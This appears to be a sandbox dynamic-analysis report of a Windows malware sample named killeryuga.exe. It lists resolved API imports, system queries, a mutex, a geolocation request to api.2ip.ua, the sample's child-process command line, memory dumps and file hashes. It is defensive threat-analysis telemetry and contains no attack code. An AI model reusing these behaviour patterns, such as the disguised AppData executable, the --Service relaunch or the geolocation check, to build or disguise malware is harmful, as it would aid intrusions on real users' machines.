Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x76ac4124 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x76ac232e True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x76ac555d True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x76aa138a True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x76a97590 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x76ac439f True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x75beeba1 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75e43c71 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x75488bff True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x75486c3c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x75491341 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x7549011a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x754aed56 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77634100 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x7548b238 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x75493e75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75364f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75361252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75364208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7536359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77610fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77609d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75365235 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x7536435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x75361b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x750926e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x770381ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75361986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x7538830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x7536183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7538896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7538828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x75362d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x75365558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x75364467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x753634d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x75491361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x75487136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x75489679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x76f77144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x76b53eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x76b53ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x76b55dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x76b54af8 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x76b53e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x76b53f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x76b54642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x76b5fd6b True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x76b1311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76b27673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x76b1b131 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x7502436b True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x7503572c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x74e9c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create LPCWSTRszTitle class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
System (686)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Sleep duration = 1 milliseconds (0.001 seconds) True 430
Fn
Get Time type = System Time, time = 2019-03-24 05:38:58 (UTC) True 1
Fn
Get Time type = Ticks, time = 94661 True 1
Fn
Get Time type = Performance Ctr, time = 14019660373 True 1
Fn
Get Time type = System Time, time = 2019-03-24 05:39:08 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 15117810092 True 1
Fn
Get Info type = Hardware Information True 249
Fn
Get Info type = Operating System True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 467 bytes
Total Data Received 7.32 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.32 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 554 True 1
Fn
Data
Close Session - True 1
Fn
Process #19: killeryuga.exe
804 2
»
Information Value
ID #19
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1920 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:10, Reason: Child Process
Unmonitor End Time: 00:03:27, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
»
Information Value
PID 0x5a4
Parent PID 0x780 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 590
0x 7B8
0x 790
0x 78C
0x 464
0x 7F4
0x 454
0x 7E0
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
buffer 0x008F43B0 0x00923716 Marked Executable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00437D77, 0x0040D690, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00420C00 False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrg~1\appdata\local\temp\temporary internet files\content.ie5\index.dat 32.00 KB MD5: ec386329eb6df438bfe57a573c340458
SHA1: 2a1cba6fecb1ffe38e8d6f649835c75e536f1aa4
SHA256: 65e3bb2968cfee7da74f2e619e60d44387eaa91acd34be75db9044012cc7a7ac
SSDeep: 3:qRFiJ2totWIltvl3sl5llwcugxmZhlldMBGlOnO/tld/txRt/r/i//llevRR//:qjyxEFpc5O+L1ji1IRX 		False
...
c:\users\5p5nrg~1\appdata\local\temp\cookies\index.dat 16.00 KB MD5: d7a950fefd60dbaa01df2d85fefb3862
SHA1: 15740b197555ba8e162c37a60ba655151e3bebae
SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
